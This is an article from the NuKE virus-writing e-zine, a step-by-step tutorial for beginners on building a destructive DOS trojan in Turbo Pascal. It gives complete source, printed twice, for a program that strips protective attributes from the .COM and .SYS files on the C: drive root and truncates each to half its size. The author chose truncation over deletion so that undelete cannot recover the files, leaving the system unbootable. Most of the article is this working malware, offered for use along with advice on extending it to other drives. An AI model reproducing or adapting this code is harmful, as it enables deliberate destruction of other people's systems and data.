Copy Link
Add to Bookmark
Report
NuKE Issue 01-023
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Turbo Pascal Programming :
I have often been asked, how can I make a virus with Turbo Pascal. Well the
answer is you can't. The reason is that Turbo Pascal doesn't have the ability
to stay resident and monitor/hook up DOS interrupts needed by a virus for the
infection of files. Turbo Pascal can make TSRs, but these are mostly one shot
deals that can execute after a certain time or after a certain number of
keystrokes. However, Turbo Pascal is an excellent language to program trojans
with, and can surpass almost everything possible with Basic. It is also
relatively easy to learn compared to Assembler or even C.
Now, what I'm going to attempt is explain the steps in creating a simple
Turbo Pascal trojan. This is for beginners only. I am simply trying to show
the different procedures and functions that can be used in trojan programming.
Thus I will detail every step and recopy the complete source at the end of
this article. By the way, I'm using the Turbo Pascal v5.5 compiler.
Important: All lines beginning with ">" are part of the program. Just type
these lines in, but omit the ">". Do not type in the ">".
Step 1- Initializing the program: Without this you're not going to get very
far. So just type in the following:
> PROGRAM TROJAN;
> USES DOS;
I'm not putting in the CRT unit because we have no need for it here.
Step 2- Figure out what you're going to do: The hardest part of programming a
trojan is coming up with a worthwhile concept. After that, programming
should be a breeze. For this one we will simply go to the root
directory and destroy the two hidden .SYS files and COMMAND.COM.
Step 3- Figure out how you're going to do it: Once you have the plan thought
up, the programming part shouldn't be to hard. Now for our trojan we
need a way to locate our files. Now since the .SYS files might differ
from one system to the other, we cannot go with default filenames. So
we are going to use a recursive procedure similar to the one in my
bypass trojan v1.0 (if you read that article) to find all .SYS and
.COM in the root directory of the C: drive. I chose the C: drive for
obvious reasons, but you can just repeat the process for all logical
drives A: to E: and more. You also need to define a few variables that
will be used later on. Type the following in:
> VAR
> Target : SEARCHREC; { Fundamental. This is a internal record that }
> { is necessary for the Findfirst function. }
> T : FILE;
> PROCEDURE KILL (FIND : STRING);
> BEGIN
Now what we want is to get drive C: so type in the following:
> Chdir ('C:\');
Now we have to find our target files. For this we will use the
internal procedure Findfirst. The command string for Findfirst is:
FindFirst(Path : string; Attr : Word; var S : SearchRec);
Where Path is the files we want to find. Path will be called from the
main program. S is the variable Target defined above and Attr is the
attributes we are looking for. Here is a list of attributes for the
Findfirst and other procedures:
ReadOnly = $01;
Hidden = $02;
SysFile = $04;
VolumeID = $08;
Directory = $10;
Archive = $20;
AnyFile = $3F;
Since we are looking for all files with all attributes except
directories, are Attr will be $3F - $10. So type this in:
> Findfirst (FIND,($3F - $10),Target);
> WHILE DOSERROR = 0 DO
> Begin
If a file is found, Doserror will equal 0. Otherwise we return to the
main program, our task achieved. Now let's say that our trojan has
found a file, we must assign it to a variable, the variable T defined
above. Now the file found by Findfirst has been saved in the Target
record. To get the full filename, we must enter Target.Name. So type
in the following:
> ASSIGN (T,Target.name);
Now we must change the files attribute to archive in case it's a
read-only or system file (the .SYS files). So we use the procedure
Setfattr. The correct command line is
SetFAttr(var F; Attr : Word);
Where F is the T variable and Attr it's new attribute. So type in the
following:
> Setfattr (T,$20);
This gives the archive attribute to our file. Having bypassed file
write-protection, we must now check for disk write-protection.
However, physical disk write-protection is unremovable, so the best we
can do is check for it, and if found, abort the program or pass to
another drive. To check for write protect we will create a directory
on the drive, and check the ioresult. If the directory is successfully
created, then ioresult will equal 0 and the disk is not
write-protected, otherwise we abort. It is important to state the
{$I-} and {$I+} parameters to turn off a possible runtime error. So
type in the following:
> {$I-}
> Mkdir ('á');
> {$I+}
> IF IORESULT = 0 THEN
> Begin
> Rmdir ('á');
We use á as this is less obvious in the compiled program. Now that we
can access are target file properly, we must decide on a way to
destroy it. Now we could erase it but this can be repaired with
undelete. So I choose to cut the file in half, thus making it
unusable. Now we use the truncate command. This command cuts the file
at the current file position. So we must go halfway into the file
before truncating it. We use seek. Type in the following:
> Reset (T);
> Seek (T,Filesize(T) DIV 2);
> Truncate (T);
> Close (T);
> End
Don't forget to close the file (Close(T)). Now we just add the command
that happens if the drive is write-protected. Type in the following:
> ELSE
> Exit;
> Findnext (Target);
> End;
> END;
The Findnext procedure simply repeats the Findfirst routine until all
files are found, then Doserror doesn't equal 0 and the program exits.
We must now type up the main program. The only checking done here is
to check if drive C: exists, and then we execute procedure KILL for
.SYS and .COM files. Type in the following:
> BEGIN
> {$I-}
> Chdir ('C:\');
> {$I+}
> IF IORESULT = 0 THEN
> Begin
> KILL ('*.COM');
> KILL ('*.SYS');
> End;
> END.
That assigns *.SYS and *.COM to FIND used in Findfirst.
Well that ends this program. I made it as detailed as possible for Turbo
Pascal beginners. More advanced programmers should have no trouble with it. To
anyone wanting to learn more, I suggest reading through all the procedures
from the DOS unit, as these are the most helpful in trojan programming. The
full source follows, and if you want to test it, simply replace C:\ with A:\
and try it on a system disk in drive A:\ (for example).
Source:
PROGRAM TROJAN;
USES DOS;
VAR
Target : SEARCHREC;
T : FILE;
PROCEDURE KILL (FIND : STRING);
BEGIN
Chdir ('C:\');
Findfirst (FIND,($3F - $10),Target);
WHILE DOSERROR = 0 DO
Begin
ASSIGN (T,Target.name);
Setfattr (T,$20);
{$I-}
Mkdir ('á');
{$I+}
IF IORESULT = 0 THEN
Begin
Rmdir ('á');
Reset (T);
Seek (T,Filesize(T) DIV 2);
Truncate (T);
Close (T);
End
ELSE
Exit;
Findnext (Target);
End;
END;
BEGIN
{$I-}
Chdir ('C:\');
{$I+}
IF IORESULT = 0 THEN
Begin
KILL ('*.COM');
KILL ('*.SYS');
End;
END.
Mechanix [NuKE]
